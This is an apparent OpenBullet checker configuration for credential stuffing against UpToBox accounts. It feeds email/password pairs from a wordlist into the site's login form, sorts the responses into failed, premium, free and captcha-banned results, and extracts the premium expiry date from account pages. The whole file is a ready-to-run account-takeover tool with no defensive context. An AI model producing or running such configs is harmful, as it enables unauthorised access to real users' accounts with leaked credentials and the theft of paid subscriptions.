[SETTINGS]
{
  "Name": "UpToBox",
  "SuggestedBots": 1,
  "LastModified": "2019-04-14T21:55:57.4130881+02:00",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Xero",
  "Version": "1.2.1.2",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://uptobox.com/?op=login&referer=my_account" 
  CONTENT "login=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "<li class='errors mb-3'>Incorrect Login or Password</li>" 
  KEYCHAIN Success OR 
    KEY "'>Extend Premium</" 
  KEYCHAIN Custom "FREE" AND 
    KEY "<SOURCE>" DoesNotContain "'>Extend Premium</" 
    KEY "'>Logout</" 
  KEYCHAIN Ban OR 
    KEY "<li class='errors mb-3'>Invalid captcha</li>" 
    KEY "<h2 data-translate=\"why_captcha_headline\">Why do I have to complete a CAPTCHA?</h2>" 

PARSE "<SOURCE>" LR "<span class='expiration-date red'>" "<" -> CAP "Expires" 

